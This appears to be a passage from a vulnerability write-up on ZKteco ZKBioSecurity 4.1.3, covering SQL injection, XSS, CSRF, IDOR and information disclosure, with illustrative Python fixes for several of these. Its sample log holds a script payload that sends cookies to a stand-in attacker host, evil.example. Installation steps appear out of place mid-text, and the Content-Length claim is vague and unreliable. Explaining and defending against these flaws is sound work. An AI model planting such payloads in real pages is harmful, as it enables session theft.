An attacker can leverage this vulnerability to inject SQL commands that the database executes, or to read sensitive information directly from the database.

ZKteco ZKBioSecurity V5000 4.1.3 was also discovered to contain a cross-site scripting (XSS) vulnerability via the component /log/index.jsp. An attacker can exploit this vulnerability to inject client-side script that executes in the browser of any user who views the affected page, which can expose that user's session data or let the attacker act with that user's privileges.
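To make the XSS class concrete, here is an added example of a minimal log viewer that renders a filter parameter and stored log lines, first by raw concatenation and then with output encoding. It is not code from ZKBioSecurity (whose /log/index.jsp is a JSP page); it is Python written for illustration, and the log entries, the filter parameter and the payload are all constructed for the example.

```python
import html

# Constructed sample log entries (hypothetical data, not taken from the product).
# The second entry carries a script payload that an earlier, unescaped request could
# have planted in the log; a viewer that prints log lines raw turns it into stored XSS.
SAMPLE_LOG_ENTRIES = [
    "2022-10-07 10:01:02 INFO user=admin action=login result=ok",
    "2022-10-07 10:02:15 WARN user=<script>new Image().src='http://evil.example/?c='+document.cookie</script> action=login result=fail",
]


def render_log_page_vulnerable(entries, filter_text):
    """Build the log viewer by plain string concatenation.

    Both the reflected 'filter' parameter and the stored log lines are inserted
    verbatim, so any markup they contain becomes part of the page and runs in
    the browser of whoever views it.
    """
    rows = "".join(f"<tr><td>{line}</td></tr>" for line in entries if filter_text in line)
    return (
        "<html><body>"
        f"<p>Showing entries matching: {filter_text}</p>"
        f"<table>{rows}</table>"
        "</body></html>"
    )


def render_log_page_safe(entries, filter_text):
    """Same page, with every untrusted value HTML-escaped at the point of insertion.

    html.escape(quote=True) also encodes ' and ", so the same helper is safe for
    values that end up inside attributes, not only in element text.
    """
    rows = "".join(
        f"<tr><td>{html.escape(line, quote=True)}</td></tr>"
        for line in entries
        if filter_text in line
    )
    return (
        "<html><body>"
        f"<p>Showing entries matching: {html.escape(filter_text, quote=True)}</p>"
        f"<table>{rows}</table>"
        "</body></html>"
    )


def contains_active_script(page_html):
    """Crude oracle for the demonstration: does a raw <script tag survive into the output?"""
    return "<script" in page_html.lower()


if __name__ == "__main__":
    reflected_payload = '"><script>alert(1)</script>'
    for label, renderer in (("vulnerable", render_log_page_vulnerable), ("safe", render_log_page_safe)):
        print(label, "stored:", contains_active_script(renderer(SAMPLE_LOG_ENTRIES, "")))
        print(label, "reflected:", contains_active_script(renderer([], reflected_payload)))
```

Escaping at the output boundary is the fix that holds regardless of where the data came from: a log viewer is a classic stored-XSS sink because anything an attacker can get written to the log (a failed username, a User-Agent header) is later rendered to an administrator. A Content-Security-Policy that disallows inline script is a useful second layer, not a substitute.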

Additionally, ZKteco ZKBioSecurity V5000 4.1.3 was found to be vulnerable to information disclosure: an attacker can obtain sensitive information by reading the application's log files.

ZKteco ZKBioSecurity V5000 4.1.3 was also discovered to be vulnerable to cross-site request forgery (CSRF). An attacker can exploit this vulnerability to make an authenticated user's browser submit requests the user never intended, performing state-changing actions with that user's privileges.
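The standard defence is a per-session anti-CSRF token that the application embeds in its forms and checks on every state-changing request. The following is an added example in Python, not code from ZKBioSecurity; the server secret, the session id and the form field names are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side secret, constructed for the example. A real deployment loads a
# random secret from configuration and never hard-codes it.
SERVER_SECRET = b"replace-with-a-random-32-byte-secret"


def issue_csrf_token(session_id, secret=SERVER_SECRET):
    """Synchronizer-style token bound to one session.

    The token is a random nonce plus an HMAC over (session_id, nonce), so the server
    can verify it later by recomputing the MAC instead of storing every issued token.
    The application embeds it in each form it renders for that session.
    """
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token, secret=SERVER_SECRET):
    """Accept only a well-formed token whose MAC matches this session.

    hmac.compare_digest keeps the comparison constant-time, so an attacker cannot
    learn a valid MAC byte by byte from response timing. Comparing bytes avoids the
    TypeError compare_digest raises for non-ASCII str input.
    """
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac.encode(), expected.encode())


def handle_state_change(session_id, form):
    """Minimal handler for a state-changing POST.

    The action runs only if the submitted form carries a token valid for the
    caller's session. A page on another origin can make the victim's browser send
    the request (cookies included), but it cannot read the token embedded in the
    victim's own page, so the forged request fails the check.
    """
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "CSRF token missing or invalid"
    return 200, f"action '{form.get('action')}' applied"


if __name__ == "__main__":
    sid = "sess-abc123"  # constructed session id
    tok = issue_csrf_token(sid)
    print(handle_state_change(sid, {"action": "delete_user", "csrf_token": tok}))
    print(handle_state_change(sid, {"action": "delete_user"}))
    print(handle_state_change("sess-other", {"action": "delete_user", "csrf_token": tok}))
```

Binding the MAC to the session id is what stops a token issued to the attacker's own session from being replayed against a victim. Setting the session cookie with SameSite=Lax or Strict is a complementary browser-side control.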

ZKteco ZKBioSecurity V5000 4.1.3 was found to be vulnerable to an insecure direct object reference (IDOR). An attacker can exploit this vulnerability by altering object identifiers in requests to read or modify data belonging to other users, and potentially to take control of affected systems.
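An IDOR is an authorization failure: the server trusts the object id in the request and never asks whether the caller may touch that object. The added example below is Python written for illustration, not code from ZKBioSecurity; the record store, user names and admin flag are constructed. It shows the unchecked lookup beside two fixes: an ownership check on every access, and a per-session indirect reference map that never exposes real ids to the client.

```python
import secrets

# Constructed in-memory store of objects owned by different accounts (hypothetical data,
# not drawn from the product). The integer keys are the ids a client sends in a request.
RECORDS = {
    101: {"owner": "alice", "name": "Front door schedule"},
    102: {"owner": "bob", "name": "Server room access list"},
}


class Forbidden(Exception):
    """Raised when the caller may not access the requested object."""


def get_record_vulnerable(record_id, requesting_user):
    """Look the object up by the id from the request and return it.

    Nothing ties the id to the caller, so changing 101 to 102 in the request hands
    over another user's record: the insecure direct object reference.
    """
    return RECORDS[record_id]


def get_record_safe(record_id, requesting_user, is_admin=False):
    """Same lookup, but the caller must own the object or hold the admin role.

    The check runs server-side on every access. A missing object and a foreign
    object produce the same error, so ids cannot be enumerated from the response.
    """
    record = RECORDS.get(record_id)
    if record is None or (record["owner"] != requesting_user and not is_admin):
        raise Forbidden(f"record {record_id} is not accessible")
    return record


def update_record_safe(record_id, requesting_user, new_name, is_admin=False):
    """Writes go through the same ownership check; modifying data is where IDOR does real damage."""
    record = get_record_safe(record_id, requesting_user, is_admin)
    record["name"] = new_name
    return record


def access_allowed(record_id, requesting_user, is_admin=False):
    """Boolean wrapper around get_record_safe, convenient for tests and access logging."""
    try:
        get_record_safe(record_id, requesting_user, is_admin)
        return True
    except Forbidden:
        return False


class IndirectRefMap:
    """Per-session map from opaque handles to real ids.

    The client only ever sees handles this map issued to it, so there is no
    predictable sequential id to tamper with; an unknown handle is rejected.
    """

    def __init__(self):
        self._handles = {}

    def issue(self, real_id):
        handle = secrets.token_urlsafe(12)
        self._handles[handle] = real_id
        return handle

    def resolve(self, handle):
        if handle not in self._handles:
            raise Forbidden("unknown object handle")
        return self._handles[handle]


def list_records_for(requesting_user, ref_map):
    """Return {handle: name} for the caller's own records only; foreign records never get a handle."""
    return {
        ref_map.issue(rid): rec["name"]
        for rid, rec in RECORDS.items()
        if rec["owner"] == requesting_user
    }


if __name__ == "__main__":
    print("vulnerable, alice asks for 102:", get_record_vulnerable(102, "alice"))
    print("safe, alice asks for 102 allowed:", access_allowed(102, "alice"))
    session_map = IndirectRefMap()
    handles = list_records_for("alice", session_map)
    print("alice's handles:", handles)
    print("resolves to:", session_map.resolve(next(iter(handles))))
```

The ownership check is the fix that matters; the indirect reference map only removes the guessable id and still relies on the server mapping handles back to objects the session was actually granted. When testing a deployment for IDOR, the same request replayed under a second, lower-privileged account with only the id changed is the quickest way to confirm whether such a check exists.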

ZKteco ZKBioSecurity V5000 Installation Steps

1. Unzip the *.zip file and copy the ZKteco ZKBioSecurity V5000 4.1.3 folder to the desired location on your server
2. Open a command prompt window (or PowerShell) in the folder where you unzipped the package
3. Run the following command: set PATH=%PATH%;C:\ZKteco\ZKBioSecurity\bin
4. If you want to run ZKteco ZKBioSecurity V5000 as a service, add the following line to your Windows startup batch file: c:\ZKteco\ZKBioSecurity\bin\run.bat


ZKteco ZKBioSecurity V5000 4.1.3 was found to be vulnerable to a Content-Length handling issue.

An attacker can exploit this vulnerability to inject client-side scripts into the application or to obtain sensitive information exposed in the application's source code.


Timeline

Published on: 10/07/2022 23:15:00 UTC
Last modified on: 10/11/2022 16:33:00 UTC
